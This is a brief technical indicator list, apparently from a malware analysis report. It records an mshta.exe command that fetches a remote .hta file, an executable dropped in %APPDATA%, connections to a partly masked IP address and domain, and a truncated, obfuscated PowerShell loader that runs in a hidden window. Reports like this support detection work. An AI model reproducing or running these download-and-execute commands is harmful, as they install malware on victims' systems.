Technical Information
- '<SYSTEM32>\mshta.exe' http://17#.#3.175.179/olmi/purchase.hta
- '%APPDATA%\knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe'
- %APPDATA%\knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe
- '17#.#3.175.179':80
- 'cu####g-tools.in':443
- http://17#.#3.175.179/olmi/purchase.hta
- http://17#.#3.175.179/olmi/Knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe
- 'cu####g-tools.in':443
- DNS ASK cu####g-tools.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function M($wn, $AX){[IO.File]::WriteAllBytes($wn, $AX)};function U($wn){if($wn.EndsWith((vR @(30472,30526,30534,30534))) -eq $True){Start-Process (vR @(30540,3054...' (with hidden window)